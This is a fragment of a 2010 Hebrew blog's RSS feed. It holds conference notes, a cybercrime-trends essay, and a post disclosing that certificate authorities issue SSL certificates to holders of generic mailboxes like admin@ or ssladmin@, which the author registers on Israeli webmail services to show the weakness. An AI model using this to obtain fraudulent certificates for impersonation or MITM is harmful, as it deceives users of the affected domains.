<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fto-hot-or-not-%25d7%2590%25d7%2595-%25d7%2597%25d7%2595%25d7%2595%25d7%2599%25d7%2599%25d7%25aa-%25d7%25a7%25d7%2591%25d7%259c%25d7%25aa-%25d7%259e%25d7%25a2%25d7%25a0%25d7%2594-%25d7%2591%25d7%25a6%25d7%2590%25d7%2598&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=TO+HOT+OR+NOT+%28%D7%90%D7%95+%D7%97%D7%95%D7%95%D7%99%D7%99%D7%AA+%D7%A7%D7%91%D7%9C%D7%AA+%D7%9E%D7%A2%D7%A0%D7%94+%D7%91%D7%A6%27%D7%90%D7%98%29+http://bit.ly/cLrH04" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/to-hot-or-not-%d7%90%d7%95-%d7%97%d7%95%d7%95%d7%99%d7%99%d7%aa-%d7%a7%d7%91%d7%9c%d7%aa-%d7%9e%d7%a2%d7%a0%d7%94-%d7%91%d7%a6%d7%90%d7%98/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>&#8235;בכנס דהמרקר&#8236;</title>		<link>http://guym.co.il/%d7%91%d7%9b%d7%a0%d7%a1-%d7%93%d7%94%d7%9e%d7%a8%d7%a7%d7%a8/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%91%d7%9b%d7%a0%d7%a1-%d7%93%d7%94%d7%9e%d7%a8%d7%a7%d7%a8/#comments</comments>
		<pubDate>Sun, 02 May 2010 07:18:14 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[מוסיקה ברשת]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1391</guid>
		<description><![CDATA[&#8235;אני אשתדל לעדכן במהלך היום, בינתיים מעניין אותי &#34;עתיד המוסיקה&#34; ברשת.
בטח אעבור לאולמות אחרים במהלך היום.
רונית ארבל (המנהלת העסקית של אייל גולן) תיארה את העבודה שמתבצעת כדי   לקדם את אייל גולן בסלולר והיה מאוד מעניין לשמוע שזאת עבודה ברמה   יומיומית.
טל ברמן בא ושם את הדברים על השולחן &#8211; יש פה השתלטות [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2591%25d7%259b%25d7%25a0%25d7%25a1-%25d7%2593%25d7%2594%25d7%259e%25d7%25a8%25d7%25a7%25d7%25a8&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אני אשתדל לעדכן במהלך היום, בינתיים מעניין אותי &quot;עתיד המוסיקה&quot; ברשת.</p>
<p>בטח אעבור לאולמות אחרים במהלך היום.</p>
<p>רונית ארבל (המנהלת העסקית של אייל גולן) תיארה את העבודה שמתבצעת כדי   לקדם את אייל גולן בסלולר והיה מאוד מעניין לשמוע שזאת עבודה ברמה   יומיומית.</p>
<p>טל ברמן בא ושם את הדברים על השולחן &#8211; יש פה השתלטות של התאגידים   הגדולים והוא דיבר בצורה יפה ומעניינת. הטענות רציניות.</p>
<p>יוני בלוך מגיב &#8211; שיר טוב זה לא מספיק. צריך משהו מעבר לזה כדי באמת   להתפרסם. קליפ איכותי, רעיון ייחודי ולא רק מוסיקה טובה.</p>
<p>ארבל מוסיפה שגם אמן כמו ריטה זה לא היה בהתחלה קל למכור לסלולר וזאת   היתה עבודה קשה לשווק אותה.</p>
<p>יאיר ניצני &#8211; אינטרנט זה כמו רשת החשמל. אף אחד לא הבטיח שהאינטרנט תהיה   המושיע של האמנים הגרועים. יאיר אומר שהרדיו מחליט בשביל אנשים מה שומעים   וארבל אומרת שרדיו זה מקום שלישי או רביעי. יאיר אומר שאם השיר גרוע הוא   בכל מקרה לא יצליח.</p>
<p>יאיר שואל אם מישהו שאין לו רונית ארבל עדיין יכול להיות ראשון? גיא   מפלאפון עונה שיש להם כמה שערים (כשאיילה צורך מקשה שיש רק שער אחד, הוא   עדיין עונה שיש כמה שערים). גיא אומר שהם מנסים להעניק ללקוח חוויה טובה   ולכן משנים את הדברים שחושבים שיקלעו לדעת הקהל.</p>
<p>איילה: למה אין חנות  מוסיקה דיגיטלית של כל החברות יחד? יאיר עונה  שהחברות לא מצליחות להגיע  להסכם (הוא אומר: זה כמו שלום עם הערבים). ישנה  השוואה לאייטיונז ואפל.</p>
<p>יוני  &#8211; ישראל מיוחדת בעניין הזה. היא מאוד מתקדמת וגם מאוד מיושנת. טל &#8211;  העניין  הוא הפתרון המלא שאפל נותנת ומחמיא לחברות הסלולר שהן עושות את זה  טוב.</p>
<p>יוני  מעלה נקודה חשובה &#8211; אין יותר ערך לסאונד טוב בשל העניין שבטלפון  שומעים  פשוט גרוע.</p>
<p>הפאנל היה מעניין ממאוד והוא מראה כמה יש אנשים  שמחוברים וכמה כאלה שלא.</p>
<p>לסיום קליפ של יוני בלוך &#8211; קליפ  אינטראקטיבי ומגניב לחלוטין <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2591%25d7%259b%25d7%25a0%25d7%25a1-%25d7%2593%25d7%2594%25d7%259e%25d7%25a8%25d7%25a7%25d7%25a8&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%91%D7%9B%D7%A0%D7%A1+%D7%93%D7%94%D7%9E%D7%A8%D7%A7%D7%A8+http://bit.ly/9RXq3Q" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%91%d7%9b%d7%a0%d7%a1-%d7%93%d7%94%d7%9e%d7%a8%d7%a7%d7%a8/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>&#8235;10 כרטיסים לכנס של דה מרקר &#8211; מי רוצה?&#8236;</title>		<link>http://guym.co.il/10-%d7%9b%d7%a8%d7%98%d7%99%d7%a1%d7%99%d7%9d-%d7%9c%d7%9b%d7%a0%d7%a1-%d7%a9%d7%9c-%d7%93%d7%94-%d7%9e%d7%a8%d7%a7%d7%a8-%d7%9e%d7%99-%d7%a8%d7%95%d7%a6%d7%94/?nucrss=1</link>
		<comments>http://guym.co.il/10-%d7%9b%d7%a8%d7%98%d7%99%d7%a1%d7%99%d7%9d-%d7%9c%d7%9b%d7%a0%d7%a1-%d7%a9%d7%9c-%d7%93%d7%94-%d7%9e%d7%a8%d7%a7%d7%a8-%d7%9e%d7%99-%d7%a8%d7%95%d7%a6%d7%94/#comments</comments>
		<pubDate>Thu, 29 Apr 2010 05:39:13 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1385</guid>
		<description><![CDATA[&#8235;דה מרקר שיחקו אותה והחליטו לתת לבלוגרים נבחרים (ואני בינהם) 10 כרטיסים לכנס COM.Vention.
פרטים על הכנס פה: http://comvention.themarker.com.
מישהו רוצה להגיע?
עריכה &#8211; מצטער, אין כרטיסים. מי שקיבל מייל &#8211; יש לכם.
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F10-%25d7%259b%25d7%25a8%25d7%2598%25d7%2599%25d7%25a1%25d7%2599%25d7%259d-%25d7%259c%25d7%259b%25d7%25a0%25d7%25a1-%25d7%25a9%25d7%259c-%25d7%2593%25d7%2594-%25d7%259e%25d7%25a8%25d7%25a7%25d7%25a8-%25d7%259e%25d7%2599-%25d7%25a8%25d7%2595%25d7%25a6%25d7%2594&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>דה מרקר שיחקו אותה והחליטו לתת לבלוגרים נבחרים (ואני בינהם) 10 כרטיסים לכנס <a href="http://comvention.themarker.com" target="_blank">COM.Vention.</a></p>
<p>פרטים על הכנס פה: <a href="http://comvention.themarker.com" target="_blank">http://comvention.themarker.com</a>.</p>
<p>מישהו רוצה להגיע?</p>
<p>עריכה &#8211; מצטער, אין כרטיסים. מי שקיבל מייל &#8211; יש לכם.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F10-%25d7%259b%25d7%25a8%25d7%2598%25d7%2599%25d7%25a1%25d7%2599%25d7%259d-%25d7%259c%25d7%259b%25d7%25a0%25d7%25a1-%25d7%25a9%25d7%259c-%25d7%2593%25d7%2594-%25d7%259e%25d7%25a8%25d7%25a7%25d7%25a8-%25d7%259e%25d7%2599-%25d7%25a8%25d7%2595%25d7%25a6%25d7%2594&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=10+%D7%9B%D7%A8%D7%98%D7%99%D7%A1%D7%99%D7%9D+%D7%9C%D7%9B%D7%A0%D7%A1+%D7%A9%D7%9C+%D7%93%D7%94+%D7%9E%D7%A8%D7%A7%D7%A8+%E2%80%93+%D7%9E%D7%99+%D7%A8%D7%95%D7%A6%D7%94%3F+http://bit.ly/cgskh2" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/10-%d7%9b%d7%a8%d7%98%d7%99%d7%a1%d7%99%d7%9d-%d7%9c%d7%9b%d7%a0%d7%a1-%d7%a9%d7%9c-%d7%93%d7%94-%d7%9e%d7%a8%d7%a7%d7%a8-%d7%9e%d7%99-%d7%a8%d7%95%d7%a6%d7%94/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>&#8235;טרנדים בעולם פשעי סייבר&#8236;</title>		<link>http://guym.co.il/cyber-crime-trends/?nucrss=1</link>
		<comments>http://guym.co.il/cyber-crime-trends/#comments</comments>
		<pubDate>Tue, 27 Apr 2010 06:45:28 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[מאמרים מקוריים]]></category>
		<category><![CDATA[Cyber Crime]]></category>
		<category><![CDATA[פשע ממוחשב]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1378</guid>
		<description><![CDATA[&#8235;גילוי נאות: הפוסט הזה הוא נגזרת של הרצאות שאני מעביר לגופים שונים. אם התחום רלוונטי לגוף בו אתם עוסקים, ניתן להזמין הרצאה כזו (הרצאה של כשעתיים עם הדגמות) או סדרת הרצאות בנושא.
בחודשים האחרונים אני רואה יותר ויותר שינויים בעולם של פושעי הרשת ולכן עידכנתי את ההרצאה שלי והחלטתי לכתוב גם כאן על זה ממש בקצרה.
הקדמה [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fcyber-crime-trends&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p><strong>גילוי נאות: </strong>הפוסט הזה הוא נגזרת של הרצאות שאני מעביר לגופים שונים. אם התחום רלוונטי לגוף בו אתם עוסקים, ניתן להזמין הרצאה כזו (הרצאה של כשעתיים עם הדגמות) או סדרת הרצאות בנושא.</p>
<p>בחודשים האחרונים אני רואה יותר ויותר שינויים בעולם של פושעי הרשת ולכן עידכנתי את ההרצאה שלי והחלטתי לכתוב גם כאן על זה ממש בקצרה.</p>
<h3><strong>הקדמה (או דעה לא מחייבת):</strong></h3>
<p>בהתחלה האקרים היו שובבים.</p>
<p>המעשים שעשו נחשבו &quot;מעשי שובבות&quot; כשהדבר העיקרי שהניע את אותם חבר'ה היה הדחף לדעת, ללמוד, לפתור בעיות. אם אותם חבר'ה ניצלו את הידע שלהם כדי להתריע על בעיות ולעזור לפתור אותן, יחד איתם התפתחו פושעי רשת. תקראו להם פושעים, פושעי רשת, קראקרים או BlackHats, בסופו של דבר הם פושעים.</p>
<p>בימים הראשונים של הרשת BlackHats עשו דברים בעיקר בשביל עצמם כשהמוטיבציה היתה גניבת חשבונות, כסף וכ&quot;ו. הבעיה היתה שאותם חבר'ה לא היו מעורים בעולם הפשע האמיתי. הם צמחו בעקבות ההזדמנות לפשוע ברשת ולהיות עבריינים אנונימיים וניסו להבין איך אפשר לעשות מזה כסף.</p>
<p>אז איך הם הרוויחו? סחר במידע, משלוח SPAM, סחיטה ע&quot;י גניבת חשבונות והחזרתם תמורת כסף, סחיטה ע&quot;י התקפות Denial Of Service ובעוד דרכים רבות. מה שמשותף לכל זה הוא אי הארגון.</p>
<p>הקראקרים האלה פעלו בעצמם ולעצמם. הבעיה העיקרית שלהם היתה איך להמיר את הכסף הוירטואלי והאלקטרוני לכסף אמיתי בלי להתפס והם השתמשו במגוון שיטות שלא אפרט לעומק (כי רובן עובדות גם היום).</p>
<p>חלק מהשיטות:</p>
<p>העברת כספים למדינות שאין בינהן קשרים דיפלומטיים ושיתוף פעולה עם גורם באותן מדינות.</p>
<p>שיתוף פעולה עם &quot;מלביני כספים&quot;.</p>
<p>הפעלת Mules &#8211; פושעים שמתמחים בהוצאת הכסף הוירטואלי והמרה לכסף אמיתי בניקוי ה&quot;קופון&quot; שלהם.</p>
<h3><strong>מפושע לפשע מאורגן</strong></h3>
<p>המפנה האמיתי חל כשעולם הפשע המאורגן הבין שיש באינטרנט פוטנציאל.</p>
<p>הכלים של פושעי הרשת התקדמו, הסוסים הטרויאנים נכתבים בצורה טובה יותר, יש שווקים בהם ניתן לרכוש שירותים משלימים.</p>
<p>יש כלים מוכנים שניתן להשתמש בהם:</p>
<p>1. סוסים טרויאנים &#8211; יש לא מעט מקומות בהם ניתן לרכוש סוסים טרויאנים. המוכר נותן על הסוס &quot;אחריות&quot; כנגד גילוי של אנטיוירוסים לפרק זמן מסויים.</p>
<p>2. התקנה &#8211; יש שווקים בהם ניתן לרכוש ולמכור &quot;התקנות&quot; אוטומטיות של סוסים. אתרים אלה מרכזים קראקרים שמצליחים לפרוץ לאתרי אינטרנט וכן אנשים שכותבים אקספלוייטים לחולשות ברכיבים שבאמצעותם ניתן להתקין את הסוסים.</p>
<p>3. שירות &#8211; ישנם נותני שירותים שיכולים להציע לפושע הרשת הטירון התקנה של שרתי Command and Control, התקנת אקספלוייטים, הגדרות וכ&quot;ו. כל מה שנשאר לפושע לעשות זה למקם iframe בתוך דפי ההדבקה שלו. הדפים יכולים להיות פרצות באתרים ידועים או Land Pages של חיפושים טובים או SPAM שמכיל קישור לאתר הדבקה.</p>
<p>4. חבילות מוכנות &#8211; ניתן בכל זמן נתון לרכוש חבילות של מליוני כתובות דואר אלק', חבילות של אלפי כתובות GMAIL, חבילות של כרטיסי אשראי גנובים, כבר הזכרתי סוסים טרויאנים, אספלוייטים וכל דבר אחר שיעזור לכם בהקמת רשת ההדבקה שלכם.</p>
<p>רוב האתרים והשירותים מנוהלים ע&quot;י &quot;מומחים&quot; מטעם גופי הפשע המאורגן. פושעי הסייבר עובדים במודע או שלא במודע בשביל פושעים מהעולם האמיתי, הלא מקוון.</p>
<p>השינוי האמיתי הוא &quot;מפעל הפשע&quot; המקוון. הדברים נהיו קלים יותר ללימוד, קלים יותר לביצוע, קלים יותר למסחר.</p>
<p>התוצאה: <span style="text-decoration: underline;">קל יותר להיות פושע רשת</span>.</p>
<p>אני אסביר ואתחיל דווקא מהסוף.</p>
<p>תארו לכם מצב בו ה-geek שרוצה להרוויח מחליט לבצע פשע. אם בסוף הוא צריך ללכת ולהסתכן ולאסוף בעצמו את הכסף מדובר במשהו מאוד מרתיע. גם אם יש מישהו שעושה את הדבר בשבילו הוא עדיין צריך להתנהל מולו והגיק החנון שלנו לא רוצה את זה. הוא לא רוצה להסתכן בשום צורה.</p>
<p>נחזור קצת אחורה. איך ילמד הגיק שלנו לכתוב סוסים טרויאנים? להשוות אותם מול חתימות אנטיוירוסים? להבין מה זה רוטקיט ולמה צריך אותו? הוא יכול לשבת וללמוד שנים או לקבל דוגמאות מוכנות כמו שזה קורה היום וללמוד מהן.</p>
<p>ואם הוא לא ממש רוצה לבצע פשעים ועדיין צריך כסף? הוא יכול לתת שירותים לפושעים. לכתוב טרויאנים או חבילות אקספלוייטים וכ&quot;ו ולקבל עליהן את התמורה.</p>
<h3><strong>לאן הולך הפשע המקוון?</strong></h3>
<p>אנו רואים כבר היום שעולם הפשע הקיברנטי משתנה.</p>
<p>צומחים יותר ויותר מומחים שמתמחים בנושאים ספציפיים במקום האקרים &quot;יודעי הכל&quot;. אם עד היום אנחנו מגדירים האקרים טובים ככאלה שמסוגלים לעשות בערך הכל, שוק הפשע המסחרי נוטה לכיוון אחר.</p>
<p>מומחים בתחומים שונים הופכים להיות רלוונטיים יותר מ&quot;יודעי כל&quot; כיוון שהם זולים יותר ומקצועיים יותר בתחום העיסוק שלהם.</p>
<p><span style="text-decoration: underline;">תחומי ההתמחות</span>: Web Applications, Social Engineering, Software Cracking and Reversing, Trojan Writing, Exploit Packs &#8211; אלה הם עיקרי התחומים בהם יעסוק פושע סייבר טכנולוג.</p>
<p>לצידם של המומחים האלה ישנם: מומחי ריגול ולוחמת רשת, מומחי כתיבת תסריטי התרחשות, אנאליסטים.</p>
<p>תחומי התמחות נוספים קיימים ללא טכנולוגים: הלבנת כספים, גניבות זהות, חיבור לפשע המאורגן הלא מקוון, ליווי מקוון לפשעים רגילים.</p>
<p>כל המומחים האלה יוצרים יחד את העובדה הפשוטה: הפשע בסייבר מתחזק.</p>
<p>הסוסים הטרויאנים הולכים ונהיים חכמים יותר, חבילות האקספלוייטים נהיות איכותיות יותר, קל יותר לקבל כסף על העבודה ויש הרבה פחות סכנה לבצע פשעי רשת.</p>
<p>בקיצור &#8211; משתלם היום להיות פושע סייבר פשוט כי קל ללמוד את זה ואתה מסתכן פחות מאשר בעבר.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fcyber-crime-trends&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%98%D7%A8%D7%A0%D7%93%D7%99%D7%9D+%D7%91%D7%A2%D7%95%D7%9C%D7%9D+%D7%A4%D7%A9%D7%A2%D7%99+%D7%A1%D7%99%D7%99%D7%91%D7%A8+http://bit.ly/azvS6E" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/cyber-crime-trends/feed/</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>&#8235;כנס http://comvention.themarker.com&#8236;</title>		<link>http://guym.co.il/%d7%9b%d7%a0%d7%a1-httpcomvention-themarker-com/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%9b%d7%a0%d7%a1-httpcomvention-themarker-com/#comments</comments>
		<pubDate>Sat, 24 Apr 2010 15:20:51 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1374</guid>
		<description><![CDATA[&#8235;מישהו יכול לארגן לי הזמנה לכנס COM.Vention של דהמרקר?
פרטים על הכנס פה: http://comvention.themarker.com...
נראה מעניין ולא בא לי להוציא 450 ש&#34;ח..
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%259b%25d7%25a0%25d7%25a1-httpcomvention-themarker-com&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>מישהו יכול לארגן לי הזמנה לכנס COM.Vention של דהמרקר?</p>
<p>פרטים על הכנס פה: <a href="http://comvention.themarker.com" target="_blank">http://comvention.themarker.com..</a>.<br />
נראה מעניין ולא בא לי להוציא 450 ש&quot;ח..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%259b%25d7%25a0%25d7%25a1-httpcomvention-themarker-com&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%9B%D7%A0%D7%A1+http%3A%2F%2Fcomvention.themarker.com+http://bit.ly/dCLwRa" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%9b%d7%a0%d7%a1-httpcomvention-themarker-com/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>&#8235;איך אפשר לייצר לעצמך Certificate לשירותי MAIL?&#8236;</title>		<link>http://guym.co.il/%d7%90%d7%99%d7%9a-%d7%90%d7%a4%d7%a9%d7%a8-%d7%9c%d7%99%d7%99%d7%a6%d7%a8-%d7%9c%d7%a2%d7%a6%d7%9e%d7%9a-certificate-%d7%9c%d7%a9%d7%99%d7%a8%d7%95%d7%aa%d7%99-mail/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%90%d7%99%d7%9a-%d7%90%d7%a4%d7%a9%d7%a8-%d7%9c%d7%99%d7%99%d7%a6%d7%a8-%d7%9c%d7%a2%d7%a6%d7%9e%d7%9a-certificate-%d7%9c%d7%a9%d7%99%d7%a8%d7%95%d7%aa%d7%99-mail/#comments</comments>
		<pubDate>Thu, 22 Apr 2010 12:01:59 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[מאמרים מקוריים]]></category>
		<category><![CDATA[Certificate]]></category>
		<category><![CDATA[SSL]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1349</guid>
		<description><![CDATA[&#8235;לפני כמה ימים יניב פלדמן מ-NewsGeek שלח לי את הכתבה הזו: http://keyboardcowboy.ca/2010/04/whos-letting-me-become-ssladmin.
הפוסט הזה מדבר על העובדה שניתן לייצר לעצמכם SSL Certificate אם יש לכם את שם התיבה המתאים בקלות.
הסבר:
חלק נכבד מספקי הסרטיפיקטים מאפשרים לכם לייצר סרטיפיקט בקלות אם יש לכם תיבת דואר אסטרטגית בארגון.
מה זו תיבה אסטרטגית? טוב ששאלתם.
יש את הברורות: admin, administrator, root וכ&#34;ו. [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2590%25d7%2599%25d7%259a-%25d7%2590%25d7%25a4%25d7%25a9%25d7%25a8-%25d7%259c%25d7%2599%25d7%2599%25d7%25a6%25d7%25a8-%25d7%259c%25d7%25a2%25d7%25a6%25d7%259e%25d7%259a-certificate-%25d7%259c%25d7%25a9%25d7%2599%25d7%25a8%25d7%2595%25d7%25aa%25d7%2599-mail&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>לפני כמה ימים יניב פלדמן מ-<a href="http://www.newsgeek.co.il/" target="_blank">NewsGeek</a> שלח לי את הכתבה הזו: <a href="http://keyboardcowboy.ca/2010/04/whos-letting-me-become-ssladmin/">http://keyboardcowboy.ca/2010/04/whos-letting-me-become-ssladmin</a>.</p>
<p>הפוסט הזה מדבר על העובדה שניתן לייצר לעצמכם SSL Certificate אם יש לכם את שם התיבה המתאים בקלות.</p>
<p>הסבר:</p>
<p>חלק נכבד מספקי הסרטיפיקטים מאפשרים לכם לייצר סרטיפיקט בקלות אם יש לכם תיבת דואר אסטרטגית בארגון.</p>
<p>מה זו תיבה אסטרטגית? טוב ששאלתם.</p>
<p>יש את הברורות: admin, administrator, root וכ&quot;ו. תיבה נוספת וקצת פחות נפוצה היא ssladmin וגם ssladministrator.</p>
<p>אז מה עשיתי?</p>
<p>הלכתי אל Rapidssl ובדקתי אילו שמות הוא מחשיב כשמות &quot;בטוחים&quot; להם אפשר לספק Certificate בלי בדיקות מיוחדות.</p>
<p>התוצאה היתה מפתיעה:</p>
<p>admin@, administrator@, hostmaster@, info@, is@, it@, mis@, postmaster@, root@, ssladmin@, ssladministrator@, sslwebmaster@, sysadmin@, webmaster@some_domain_name</p>
<p>בעוד חלק נראה ברור שיהיו תיבות של מנהלים, חלק מהתיבות האלו בכלל לא בטוח שמישהו שם אליהן לב או מגדיר אותן כבעייתיות.</p>
<p>מה תוכלו לעשות עם Certificates בשליטתכם? התקפות MITM על התיבות שלהם כשהכל קורה ב-SSL נעול ויציב. התחזות. תהיו יצירתיים.</p>
<p>אז מה עושה בלוגר שרוצה לבדוק מה קורה עם הדברים האלה בארץ? נכון. הלכתי לפתוח לעצמי תיבות מייל בכמה שירותים.</p>
<p>חלק יצאו טובים וחלק בעייתיים.</p>
<p>Walla:</p>
<p>הצלחתי לפתוח ללא בעיה תיבה בשם ssladministrator וגם לשלוח אליה וממנה מייל בלי שום בעיה.</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/04/walla-ssladministrator2.png"><img class="aligncenter size-full wp-image-1353" title="walla ssladministrator" src="http://guym.co.il/wp-content/uploads/2010/04/walla-ssladministrator2.png" alt="" width="983" height="293" /></a></p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/04/walla-ssladministrator-mail.png"><img class="aligncenter size-full wp-image-1352" title="walla ssladministrator mail" src="http://guym.co.il/wp-content/uploads/2010/04/walla-ssladministrator-mail.png" alt="" width="628" height="171" /></a>YNET:</p>
<p>תיבות פנויות:</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/04/ynet1.png"><img class="aligncenter size-full wp-image-1354" title="ynet1" src="http://guym.co.il/wp-content/uploads/2010/04/ynet1.png" alt="" width="1092" height="734" /></a>ועוד:</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/04/ynet2.png"><img class="aligncenter size-full wp-image-1355" title="ynet2" src="http://guym.co.il/wp-content/uploads/2010/04/ynet2.png" alt="" width="750" height="77" /></a><a href="http://guym.co.il/wp-content/uploads/2010/04/ynet3.png"><img class="aligncenter size-full wp-image-1356" title="ynet3" src="http://guym.co.il/wp-content/uploads/2010/04/ynet3.png" alt="" width="744" height="70" /></a><a href="http://guym.co.il/wp-content/uploads/2010/04/ynet4.png"><img class="aligncenter size-full wp-image-1357" title="ynet4" src="http://guym.co.il/wp-content/uploads/2010/04/ynet4.png" alt="" width="744" height="72" /></a></p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/04/ynet5.png"><img class="aligncenter size-full wp-image-1358" title="ynet5" src="http://guym.co.il/wp-content/uploads/2010/04/ynet5.png" alt="" width="400" height="227" /></a></p>
<p>מה שמוזר בעניין הוא שלא הצלחתי לקבל לתיבה הזו דואר אבל כן הצלחתי לשלוח ממנה דואר בלי בעיה. אולי קבלת הדואר לכתובת הזו היתה בעייתית ואולי השירות לא ממש מהיר..</p>
<p>בקיצור, אם הייתי רוצה לנצל את העניין הייתי צריך כנראה לבקש שאת ההתכתבויות הבאות לאחר הפניה לפתיחת לקוח נמשיך במייל הרגיל שלי בחברה (הייתי פותח שם תיבת דואר נוספת).</p>
<p>בקיצור, שני האתרים האלה ואני מניח שרבים אחרים פגיעים בצורה כזו או אחרת לעניין.</p>
<p>ברגעים בהם שלחתי את הפוסט, שלחתי לינק אל abuse@walla.co.il, abuse@ynet.co.il. ב-WALLA לא קיימת כתובת כזו. מעניין לאן אפשר לשלוח <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>עדכון:</p>
<p>בתחילה כתבתי גם על תפוז אך קיבלתי הרגע מייל מהם (השם של השולח שמור במערכת).</p>
<p>מתברר שהתיבות אצלהן אינן תיבות דואר חיצוני ולכן אין כאן משמעות לשם שנפתח וברור שאין פגיעות.</p>
<p>ניתן לשלוח שם הודעות פנימיות בלבד ולא חיצוניות.</p>
